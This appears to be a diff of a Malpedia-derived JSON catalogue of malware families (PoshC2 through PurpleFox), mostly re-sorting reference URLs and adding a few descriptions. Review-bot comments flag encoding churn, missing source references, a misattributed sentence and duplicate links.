"https://ti.dbappsecurity.com.cn/blog/articles/2021/09/06/operation-maskface/", + "https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md" ], "synonyms": [], "type": [] @@ -38452,9 +40255,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp", + "https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/", "https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf", "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/", - "https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/", "https://twitter.com/just_windex/status/1162118585805758464" ], "synonyms": [ @@ -38471,9 +40274,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poulight_stealer", "https://twitter.com/MBThreatIntel/status/1240389621638402049?s=20", - "https://www.youtube.com/watch?v=MaPXDCq-Gf4", "https://www.carbonblack.com/blog/tau-threat-discovery-cryptocurrency-clipper-malware-evolves/", - "https://blog.360totalsecurity.com/en/a-txt-file-can-steal-all-your-secrets/?web_view=true" + "https://blog.360totalsecurity.com/en/a-txt-file-can-steal-all-your-secrets/?web_view=true", + "https://www.youtube.com/watch?v=MaPXDCq-Gf4" ], "synonyms": [ "Poullight" 
@@ -38484,12 +40287,12 @@
 "value": "Poulight Stealer"
 },
 {
- "description": "According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to “securely” test the ransomware protection capabilities of security vendor products.",
+ "description": "According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to \u201csecurely\u201d test the ransomware protection capabilities of security vendor products.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.povlsomware",
- "https://www.trendmicro.com/en_us/research/21/c/povlsomware-ransomware-features-cobalt-strike-compatibility.html",
- "https://youtu.be/oYLs6wuoOfg"
+ "https://youtu.be/oYLs6wuoOfg",
+ "https://www.trendmicro.com/en_us/research/21/c/povlsomware-ransomware-features-cobalt-strike-compatibility.html"
 ],
 "synonyms": [],
 "type": []
@@ -38503,8 +40306,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks",
 "https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/",
- "https://www.gdatasoftware.com/blog/2014/07/23947-poweliks-the-persistent-malware-without-a-file",
- "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users"
+ "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users",
+ "https://www.gdatasoftware.com/blog/2014/07/23947-poweliks-the-persistent-malware-without-a-file"
 ],
 "synonyms": [],
 "type": []
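Review bot: The Povlsomware description line changes only in how the curly quotes are encoded — `“securely”` becomes `\u201csecurely\u201d` — which parses to the identical string, so this is a serializer-policy change (ASCII-escaping non-ASCII) rather than a content edit. If the generator now escapes every non-ASCII character, that is a fine, interoperable choice, but it should be applied uniformly and stated in the commit message so reviewers can distinguish it from real description changes; parsing both sides and comparing the values is enough to confirm nothing else moved. The Povlsomware entry continues past the end of the hunk.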
@@ -38531,8 +40334,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.powercat",
 "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://twitter.com/VK_Intel/status/1141540229951709184",
- "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/"
+ "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
+ "https://twitter.com/VK_Intel/status/1141540229951709184"
 ],
 "synonyms": [],
 "type": []
@@ -38545,8 +40348,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke",
- "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/",
- "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/"
+ "https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
+ "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"
 ],
 "synonyms": [],
 "type": []
@@ -38613,10 +40417,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff",
 "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/",
+ "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf",
 "https://lokalhost.pl/gozi_tree.txt",
 "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2017",
- "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf"
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2017"
 ],
 "synonyms": [
 "PUNCHBUGGY"
@@ -38631,13 +40435,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba",
- "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/",
- "https://content.fireeye.com/apt/rpt-apt38",
 "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/",
+ "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/",
 "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/"
+ "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf"
 ],
 "synonyms": [
 "QUICKRIDE.POWER"
@@ -38666,16 +40470,16 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator",
 "https://www.secureworks.com/research/threat-profiles/gold-galleon",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html",
- "https://securelist.com/a-predatory-tale/89779",
- "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
- "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/",
- "https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/",
 "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/",
+ "https://securelist.com/a-predatory-tale/89779",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/",
+ "https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html"
 ],
 "synonyms": [],
 "type": []
@@ -38684,12 +40488,12 @@
 "value": "Predator The Thief"
 },
 {
- "description": "Ransomware.",
+ "description": "According to PCrisk, Prestige is ransomware - malware that prevents victims from accessing (opening) their files by encrypting them. Additionally, Prestige appends the \".enc\" extension to filenames and drops the \"README\" file containing a ransom note. An example of how this ransomware modifies filenames: it renames \"1.jpg\" to \"1.jpg.enc\", \"2.png\" to \"2.png.enc\", and so forth.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.prestige",
- "https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/",
- "https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/"
+ "https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/",
+ "https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/"
 ],
 "synonyms": [],
 "type": []
@@ -38702,6 +40506,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka",
+ "https://securelist.com/cloudwizard-apt/109722/",
 "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf"
 ],
 "synonyms": [],
@@ -38730,8 +40535,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker",
 "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/",
- "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/",
- "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/"
+ "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/",
+ "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/"
 ],
 "synonyms": [],
 "type": []
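Review bot: The new Prestige description opens with "According to PCrisk", but the `refs` array in the same hunk holds only the malpedia URL and two Microsoft posts, so the behavioural claims it quotes (the `.enc` extension, the `README` ransom note) cannot be traced to their source from the entry; the PCrisk page the text was taken from should be added to `refs`. The PseudoManuscrypt hunk further down has the same gap — a PCrisk attribution with no PCrisk reference. The Prestige entry continues past the end of this hunk.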
@@ -38744,20 +40549,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader", + "https://tavares.re/blog/2022/06/06/hunting-privateloader-pay-per-install-service/", + "https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise", + "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem", + "https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign", + "https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html", + "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://www.youtube.com/watch?v=Ldp7eESQotM", "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service", "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e", "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", - "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem", - "https://tavares.re/blog/2022/06/06/hunting-privateloader-pay-per-install-service/", - "https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html", "https://www.zscaler.com/blogs/security-research/peeking-privateloader", - "https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise", - "https://www.youtube.com/watch?v=Ldp7eESQotM", - "https://intel471.com/blog/privateloader-malware", - "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign", - "https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1" + 
"https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1", + "https://any.run/cybersecurity-blog/privateloader-analyzing-the-encryption-and-decryption-of-a-modern-loader/", + "https://intel471.com/blog/privateloader-malware" ], "synonyms": [], "type": [] @@ -38770,10 +40576,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.privatelog", - "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", - "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", + "https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive", "https://twitter.com/ESETresearch/status/1433819369784610828", - "https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive" + "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", + "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html" ], "synonyms": [], "type": [] @@ -38799,10 +40605,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prometei", - "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", - "https://twitter.com/honeymoon_ioc/status/1494016518694309896", - "https://blog.talosintelligence.com/prometei-botnet-improves/", "https://twitter.com/honeymoon_ioc/status/1494311182550904840", + "https://blog.talosintelligence.com/prometei-botnet-improves/", + "https://twitter.com/honeymoon_ioc/status/1494016518694309896", + "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", "https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities" ], "synonyms": [], 
@@ -38816,16 +40622,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.prometheus",
+ "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware",
 "https://unit42.paloaltonetworks.com/prometheus-ransomware/",
 "https://medium.com/s2wlab/prometheus-x-spook-prometheus-ransomware-rebranded-spook-ransomware-6f93bd8ab5dd",
- "https://therecord.media/decryptor-released-for-prometheus-ransomware-victims/",
- "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware",
 "https://twitter.com/inversecos/status/1441252744258461699?s=20",
+ "https://therecord.media/decryptor-released-for-prometheus-ransomware-victims/",
+ "https://www.sentinelone.com/labs/spook-ransomware-prometheus-derivative-names-those-that-pay-shames-those-that-dont/",
 "https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/",
 "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd",
- "https://www.sentinelone.com/labs/spook-ransomware-prometheus-derivative-names-those-that-pay-shames-those-that-dont/",
- "https://id-ransomware.blogspot.com/2021/05/prometheus-ransomware.html",
- "https://medium.com/cycraft/prometheus-decryptor-6933e7bac1ea"
+ "https://medium.com/cycraft/prometheus-decryptor-6933e7bac1ea",
+ "https://id-ransomware.blogspot.com/2021/05/prometheus-ransomware.html"
 ],
 "synonyms": [],
 "type": []
@@ -38864,8 +40670,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot",
- "https://www.youtube.com/watch?v=FttiysUZmDw",
- "https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/"
+ "https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/",
+ "https://www.youtube.com/watch?v=FttiysUZmDw"
 ],
 "synonyms": [],
 "type": []
@@ -38889,14 +40695,15 @@
 "value": "Prynt Stealer"
 },
 {
- "description": "",
+ "description": "According to PCrisk, PseudoManuscrypt is the name of the malware that spies on victims. It is similar to another malware called Manuscrypt. We have discovered PseudoManuscrypt while checking installers for pirated software (one of the examples is a fake pirated installer for SolarWinds - a network monitoring software).",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pseudo_manuscrypt",
- "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://www.youtube.com/watch?v=uakw2HMGZ-I",
 "https://ics-cert.kaspersky.com/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/",
- "https://asec.ahnlab.com/en/31683/",
 "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://asec.ahnlab.com/en/31683/",
 "https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1"
 ],
 "synonyms": [],
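Review bot: The new PseudoManuscrypt description opens with `According to PCrisk,` and then switches to the first person (`We have discovered PseudoManuscrypt while checking installers for pirated software`), so the discovery claim reads as PCrisk's own while the `We` presumably belongs to whichever vendor report PCrisk was summarising. Every entry here carries a malpedia.caad.fkie.fraunhofer.de ref first, so the text is likely synced from Malpedia and the wording should be fixed upstream too, but as merged the sentence misattributes the finding. I would recast the last sentence without a first-person subject, e.g. `PseudoManuscrypt was discovered while checking installers for pirated software (one of the examples is a fake pirated installer for SolarWinds - a network monitoring software).`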
@@ -38910,13 +40717,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix",
- "https://twitter.com/seckle_ch/status/1169558035649433600",
- "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/",
- "https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure",
 "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://twitter.com/mesa_matt/status/1035211747957923840",
+ "https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure",
+ "https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module",
+ "https://twitter.com/seckle_ch/status/1169558035649433600",
 "https://blog.comodo.com/comodo-news/versions-of-psixbot/",
- "https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module"
+ "https://twitter.com/mesa_matt/status/1035211747957923840",
+ "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/"
 ],
 "synonyms": [
 "PsiXBot"
@@ -38931,9 +40738,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a",
+ "https://twitter.com/KevinPerlow/status/1160766519615381504",
 "https://norfolkinfosec.com/a-lazarus-keylogger-pslogger/",
- "https://twitter.com/KevinPerlow/status/1160766519615381504"
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a"
 ],
 "synonyms": [
 "ECCENTRICBANDWAGON"
@@ -38963,31 +40770,33 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine",
 "https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/",
- "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations",
- "https://www.bleepingcomputer.com/news/security/russian-gamaredon-hackers-use-8-new-malware-payloads-in-attacks/",
- "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf",
- "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/",
- "https://cert.gov.ua/news/42",
- "https://blogs.cisco.com/security/network-footprints-of-gamaredon-group",
- "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/",
- "https://labs.sentinelone.com/pro-russian-cyberspy-gamaredon-intensifies-ukrainian-security-targeting/",
- "https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt",
- "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine",
- "https://blogs.blackberry.com/en/2022/11/gamaredon-leverages-microsoft-office-docs-to-target-ukraine-government",
- "https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/",
- "https://www.elastic.co/blog/playing-defense-against-gamaredon-group",
- "https://attack.mitre.org/groups/G0047",
- "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html",
- "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/",
- "https://blog.threatstop.com/russian-apt-gamaredon-group",
- "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021",
- "https://cert.gov.ua/news/46",
- "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
+ "https://www.bleepingcomputer.com/news/security/russian-gamaredon-hackers-use-8-new-malware-payloads-in-attacks/",
 "https://threatmon.io/cybergun-technical-analysis-of-the-armageddons-infostealer/",
- "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military",
+ "https://www.elastic.co/blog/playing-defense-against-gamaredon-group",
+ "https://blogs.blackberry.com/en/2022/11/gamaredon-leverages-microsoft-office-docs-to-target-ukraine-government",
+ "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
+ "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf",
+ "https://labs.sentinelone.com/pro-russian-cyberspy-gamaredon-intensifies-ukrainian-security-targeting/",
+ "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021",
+ "https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/Gamaredon_activity.pdf",
+ "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html",
+ "https://blogs.cisco.com/security/network-footprints-of-gamaredon-group",
+ "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations",
+ "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game",
+ "https://attack.mitre.org/groups/G0047",
+ "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/",
+ "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/",
+ "https://blog.threatstop.com/russian-apt-gamaredon-group",
+ "https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/",
+ "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
+ "https://cert.gov.ua/news/46",
+ "https://cert.gov.ua/news/42",
+ "https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt"
 ],
 "synonyms": [
 "Pterodo"
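Review bot: The re-sorted pteranodon refs still carry two near-duplicate pairs on the new side: `https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations` with and without a trailing slash, and `https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021` likewise. The same pattern survives in the pupy hunk (the Symantec elfin-apt33 post under both `www.symantec.com` and `symantec-blogs.broadcom.com`) and in the pushdo hunk (`.../threat-profiles/gold-essex` under both `http://` and `https://`). Both forms of each pair were already present before this change, so this is not a regression, but since the commit rewrites every refs list anyway it is the natural point to canonicalise (strip the trailing slash, prefer https) and dedupe before sorting, presumably in whatever script produces this file rather than by hand.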
@@ -39034,22 +40843,22 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy",
- "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/",
- "https://www.infinitumit.com.tr/apt-35/",
- "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://github.com/n1nj4sec/pupy",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html",
- "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
- "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations",
- "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt",
 "https://labs.k7computing.com/index.php/pupy-rat-hiding-under-werfaults-cover/",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt"
+ "https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html",
+ "https://www.infinitumit.com.tr/apt-35/",
+ "https://github.com/n1nj4sec/pupy",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/",
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
+ "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/",
+ "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf",
+ "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf"
 ],
 "synonyms": [
 "Patpoopy"
@@ -39060,12 +40869,12 @@
 "value": "pupy (Windows)"
 },
 {
- "description": "According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021\r\nThe malware has been observed distributing a variety of remote access trojans and information stealers\r\nThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products\r\nPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google’s Protocol Buffer message format ",
+ "description": "According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021\r\nThe malware has been observed distributing a variety of remote access trojans and information stealers\r\nThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products\r\nPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google\u2019s Protocol Buffer message format ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter",
- "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter",
- "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf"
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter"
 ],
 "synonyms": [],
 "type": []
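Review bot: The only change to the PureCrypter description is `Google’s` becoming `Google\u2019s`; both spellings decode to the same string, so this line, and the PurpleWave description in the hunk a few entries below, is serialisation churn rather than a content update, presumably because the generator switched to ASCII-escaped output. If ASCII-only escaping is now the intended policy it is worth pinning it in the export so a later sync does not flip these lines back; if not, these description-only hunks could be dropped from the sync. While this line is being touched, the string still ends with a trailing space before the closing quote and uses `\r\n` line breaks, which the regeneration could normalise at the same time.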
@@ -39078,9 +40887,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker",
- "https://www.intezer.com/blog-purelocker-ransomware-being-used-in-targeted-attacks-against-servers/",
+ "https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e",
 "https://github.com/albertzsigovits/malware-notes/blob/master/PureLocker.md",
- "https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e"
+ "https://www.intezer.com/blog-purelocker-ransomware-being-used-in-targeted-attacks-against-servers/"
 ],
 "synonyms": [],
 "type": []
@@ -39093,24 +40902,27 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox",
